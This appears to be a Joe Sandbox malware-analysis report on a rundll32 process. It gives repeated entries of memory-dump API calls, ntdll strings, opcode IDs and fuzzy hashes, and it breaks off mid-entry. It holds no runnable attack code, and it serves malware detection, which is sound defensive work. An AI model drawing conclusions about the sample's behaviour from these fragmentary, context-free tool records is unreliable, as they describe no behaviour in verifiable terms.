                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00123AF8), ref: 0013A68D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_120000_rundll32.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FreeHeap
                                                                                                                                                                  • String ID: .z`
                                                                                                                                                                  • API String ID: 3298025750-1441809116
                                                                                                                                                                  • Opcode ID: ec6dce930ad34ed308474acdbf942c3acf76682733a126d36dd40f7544e4c349
                                                                                                                                                                  • Instruction ID: d91fe38be3bb499f38d398b9810ac90314acd9d16e7168eb441b4d911dbd3e43
                                                                                                                                                                  • Opcode Fuzzy Hash: ec6dce930ad34ed308474acdbf942c3acf76682733a126d36dd40f7544e4c349
                                                                                                                                                                  • Instruction Fuzzy Hash: A3E06DB1240204AFDB18DFA4CC85EEB7B6CEF99310F048559FD5C9B251C631E814CBA0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00123AF8), ref: 0013A68D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_120000_rundll32.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FreeHeap
                                                                                                                                                                  • String ID: .z`
                                                                                                                                                                  • API String ID: 3298025750-1441809116
                                                                                                                                                                  • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                                                                  • Instruction ID: ba9174473d512afbe68670cc8a1507377fb177b5d8c8fb597708f04c86961d8f
                                                                                                                                                                  • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                                                                  • Instruction Fuzzy Hash: ECE012B1200208ABDB18EF99CC49EAB77ACAF88750F018558BA5C5B242C630E9108AB0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0012836A
                                                                                                                                                                  • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0012838B
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_120000_rundll32.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessagePostThread
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1836367815-0
                                                                                                                                                                  • Opcode ID: 3172d27be0b016439e5481d8b21c313a41ffbcab7864ad54bb0489d0eefa33a4
                                                                                                                                                                  • Instruction ID: 2f2543b826ae587e16d99f45a413f24be17abd23a1b58a15c7cc09ffafb394fe
                                                                                                                                                                  • Opcode Fuzzy Hash: 3172d27be0b016439e5481d8b21c313a41ffbcab7864ad54bb0489d0eefa33a4
                                                                                                                                                                  • Instruction Fuzzy Hash: 05018F31A8122877E720A6949C43FBE776C6F50F51F050119FF04BA1C2EBA4B91647E6
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0012AD52
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_120000_rundll32.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Load
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2234796835-0
                                                                                                                                                                  • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                                                                                                                                  • Instruction ID: c00fe3c02583c081de599f91ebb6c424413f71f4cc01fe494c0c7376c5d84b03
                                                                                                                                                                  • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                                                                                                                                  • Instruction Fuzzy Hash: A6011EB5D4020DABDB10EAE4ED42F9EB3789F54308F104195E909A7241F731EB14CB91
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0013A724
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_120000_rundll32.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateInternalProcess
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2186235152-0
                                                                                                                                                                  • Opcode ID: e991c55cb4d201102235aea3611ade9c83a00b0a31524471731a2ae0ca180161
                                                                                                                                                                  • Instruction ID: 41e77a6739230129fca3fdb38e4af215dffd97778e57bfaaaf2267c2204845cf
                                                                                                                                                                  • Opcode Fuzzy Hash: e991c55cb4d201102235aea3611ade9c83a00b0a31524471731a2ae0ca180161
                                                                                                                                                                  • Instruction Fuzzy Hash: 340199B2210108AFCB58CF99DC81EEB37ADAF8C754F158258FA5DA7250D630E851CBA0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0013A724
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_120000_rundll32.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateInternalProcess
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2186235152-0
                                                                                                                                                                  • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                                                                  • Instruction ID: cceb6cd1ed89e87a38e650bdd01df375d57b209efaffe2102de2bb9cd717ead0
                                                                                                                                                                  • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                                                                  • Instruction Fuzzy Hash: AD01B2B2210108BFCB54DF89DC80EEB77ADAF8C754F158258FA4D97241C630E851CBA4
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,-00000002,?,00000000,00000000,?,?,0012F040,?,?,00000000), ref: 001391DC
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_120000_rundll32.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateThread
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2422867632-0
                                                                                                                                                                  • Opcode ID: d8d341beacf55d3aadfcb46bdd6eb0ebc06c290d7a953d7ae1546744555f20b2
                                                                                                                                                                  • Instruction ID: 4c3a9d8fd3a6782410f21fb7d87bfa1bdf9fc6e0b57caae8a82327103f8b437a
                                                                                                                                                                  • Opcode Fuzzy Hash: d8d341beacf55d3aadfcb46bdd6eb0ebc06c290d7a953d7ae1546744555f20b2
                                                                                                                                                                  • Instruction Fuzzy Hash: ADE06D377902043AE2206599AC02FA7B39C9B91B61F14003AFA0DEB2C1D695F80142A4
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,0012F1C2,0012F1C2,?,00000000,?,?), ref: 0013A7F0
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_120000_rundll32.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: LookupPrivilegeValue
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3899507212-0
                                                                                                                                                                  • Opcode ID: 1dafe668f73527814c7d2a5754961dc33b59b2ca7c35c401fdaeae71204b43ce
                                                                                                                                                                  • Instruction ID: 60d654b7b480800790f62457b84ce96494b050400476cb2c53cce3907b14096c
                                                                                                                                                                  • Opcode Fuzzy Hash: 1dafe668f73527814c7d2a5754961dc33b59b2ca7c35c401fdaeae71204b43ce
                                                                                                                                                                  • Instruction Fuzzy Hash: C4E06DB2600218ABD620DF99CC40EE777ADAF45760F058254FE1C9B781C631E9448BF1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00134526,?,00134C9F,00134C9F,?,00134526,?,?,?,?,?,00000000,00000000,?), ref: 0013A64D
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_120000_rundll32.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                  • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                                                                  • Instruction ID: 18f896c6768a867eca6fc7c972253e350f58e9476ff11bc5053caf230727b0af
                                                                                                                                                                  • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                                                                  • Instruction Fuzzy Hash: 59E012B1200208ABDB14EF99CC41EAB77ACAF88654F118558BA5C5B242C630F9108AB0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,0012F1C2,0012F1C2,?,00000000,?,?), ref: 0013A7F0
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_120000_rundll32.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: LookupPrivilegeValue
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3899507212-0
                                                                                                                                                                  • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                                                                  • Instruction ID: 556fd0b3180d1de8846728f0f496990304f406005f0b103aebd967884d3ba4de
                                                                                                                                                                  • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                                                                  • Instruction Fuzzy Hash: F7E01AB1200208ABDB10DF49CC85EEB37ADAF88650F018154BA4C57241CA30E8108BF5
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • SetErrorMode.KERNEL32(00008003,?,00128D14,?), ref: 0012F6EB
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_120000_rundll32.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorMode
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2340568224-0
                                                                                                                                                                  • Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                                                                                                                                                  • Instruction ID: 10f040deb2965a3fa57e09556b2a02186a7f1b9844e043759aa9edff8c67c1fa
                                                                                                                                                                  • Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                                                                                                                                                  • Instruction Fuzzy Hash: 0BD0A7727503043BE610FEA49C03F2633CCAB54B00F490074F949E73C3DA54F4014165
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3710698216.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043C0000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.00000000044E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.00000000044ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.000000000455E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_43c0000_rundll32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                  • Opcode ID: 3bdd1a012801387001c338488ca30ee779bb8fcf0c71a39badfd9307c7b86eaa
                                                                                                                                                                  • Instruction ID: 7b6fa4733c0713f633e9a71ffc290b0d882fee1b63f518b6b6489eb74f4a4fb6
                                                                                                                                                                  • Opcode Fuzzy Hash: 3bdd1a012801387001c338488ca30ee779bb8fcf0c71a39badfd9307c7b86eaa
                                                                                                                                                                  • Instruction Fuzzy Hash: F5B04C759015C585FE11B760460861779006BD0B05F15C062D2121655A4768E191E175
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3710698216.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043C0000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.00000000044E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.00000000044ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.000000000455E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_43c0000_rundll32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                  • API String ID: 48624451-2108815105
                                                                                                                                                                  • Opcode ID: a0a95ca589193e98c1b9ddce7543b032af8de44eae915c23daa4df5253886ca5
                                                                                                                                                                  • Instruction ID: d4eed6ebe28d1fee6ad24571ed3a5822ec4cb17e9815b5fb57ceb960f12d64e5
                                                                                                                                                                  • Opcode Fuzzy Hash: a0a95ca589193e98c1b9ddce7543b032af8de44eae915c23daa4df5253886ca5
                                                                                                                                                                  • Instruction Fuzzy Hash: 8F51E6B2B00516BFDF20DF99988097FF7B8BF4960571482ABE455E3641E274FE118BA0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3710698216.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043C0000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.00000000044E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.00000000044ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.000000000455E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_43c0000_rundll32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                  • API String ID: 48624451-2108815105
                                                                                                                                                                  • Opcode ID: 632a0426ec4b3627425c822164f8632ff1eed4ade2b908c5033c51badd7a30fb
                                                                                                                                                                  • Instruction ID: fe36f8e1a16b81b464b22a4270d09e9891e795fe454b6e045d52c72be0aaaed4
                                                                                                                                                                  • Opcode Fuzzy Hash: 632a0426ec4b3627425c822164f8632ff1eed4ade2b908c5033c51badd7a30fb
                                                                                                                                                                  • Instruction Fuzzy Hash: 8E512370A00655ABDF30DF9DC98087FB7F9FB54204B04849BE496D7781E6B0FA10AB60
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Strings
                                                                                                                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 044646FC
                                                                                                                                                                  • Execute=1, xrefs: 04464713
                                                                                                                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04464725
                                                                                                                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04464742
                                                                                                                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04464655
                                                                                                                                                                  • ExecuteOptions, xrefs: 044646A0
                                                                                                                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 04464787
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3710698216.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043C0000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.00000000044E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.00000000044ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.000000000455E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_43c0000_rundll32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                  • API String ID: 0-484625025
                                                                                                                                                                  • Opcode ID: c79c4960544492a2fb84d47fb3c92a73769a34e460b437de7ec1894f19ef2473
                                                                                                                                                                  • Instruction ID: c4624159bb7a889c979eb0fa1467898943825f387be8ae1dcf22d18bf3e833dc
                                                                                                                                                                  • Opcode Fuzzy Hash: c79c4960544492a2fb84d47fb3c92a73769a34e460b437de7ec1894f19ef2473
                                                                                                                                                                  • Instruction Fuzzy Hash: 3F512B316002296BEF20EEA5ED89FAA77A8EF08714F44009FD505A7281EB71BE458F55
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3710698216.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043C0000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.00000000044E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.00000000044ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.000000000455E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_43c0000_rundll32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                                                                                                  • Instruction ID: 70d09dd2fd3a89efefdf9ce57026a3e6bcbb9e1198525ae1ae70617a2bb69302
                                                                                                                                                                  • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                                                                                                  • Instruction Fuzzy Hash: B9022675608341AFDB54CF29C490A6FBBE5EFC8704F09892EF9894B265DB31E905CB42
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3710698216.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043C0000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.00000000044E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.00000000044ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.000000000455E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_43c0000_rundll32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __aulldvrm
                                                                                                                                                                  • String ID: +$-$0$0
                                                                                                                                                                  • API String ID: 1302938615-699404926
                                                                                                                                                                  • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                                                                  • Instruction ID: aeb7a357b177ab0f2a18a6db64fc16af16080fcd8dc584096d880e0d6e376375
                                                                                                                                                                  • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                                                                  • Instruction Fuzzy Hash: E481C370E052899EDF288E68C8517FE7BA1EF4DB22F18411BD861A7393D734B4418B51
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3710698216.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043C0000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.00000000044E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.00000000044ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.000000000455E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_43c0000_rundll32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                                  • String ID: %%%u$[$]:%u
                                                                                                                                                                  • API String ID: 48624451-2819853543
                                                                                                                                                                  • Opcode ID: bc34f123b65d93a1e1ebb350d510c5521a8aaa2b89560ff876e5134edf27df23
                                                                                                                                                                  • Instruction ID: 34c8ff48dd8d0f3f8b19b9f8fa0686d47b6f0030c5ebf2f6ac8a6a1c3fbd2c6a
                                                                                                                                                                  • Opcode Fuzzy Hash: bc34f123b65d93a1e1ebb350d510c5521a8aaa2b89560ff876e5134edf27df23
                                                                                                                                                                  • Instruction Fuzzy Hash: E4218176A00129ABDF20DFA9D844AFFB7E8EF58745F04016BE905E3301E770E9119BA0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Strings
                                                                                                                                                                  • RTL: Re-Waiting, xrefs: 0446031E
                                                                                                                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 044602BD
                                                                                                                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 044602E7
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3710698216.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043C0000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.00000000044E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.00000000044ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.000000000455E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_43c0000_rundll32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                                  • API String ID: 0-2474120054
                                                                                                                                                                  • Opcode ID: 04719084f5d0296739cb2b49038d429d02187d550def95068d0edf23ff9d42d1
                                                                                                                                                                  • Instruction ID: 6096a56ab76a2aa15df98cf6db4b8e4a54c24a968f1cb13dccf2bf7bbade651d
                                                                                                                                                                  • Opcode Fuzzy Hash: 04719084f5d0296739cb2b49038d429d02187d550def95068d0edf23ff9d42d1
                                                                                                                                                                  • Instruction Fuzzy Hash: 03E190706047419FDB25CF28C844B6AB7E0BF88714F140A5EE5A68B3E1E775F94ACB42
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Strings
                                                                                                                                                                  • RTL: Re-Waiting, xrefs: 04467BAC
                                                                                                                                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04467B7F
                                                                                                                                                                  • RTL: Resource at %p, xrefs: 04467B8E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3710698216.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043C0000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.00000000044E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.00000000044ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.000000000455E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_43c0000_rundll32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
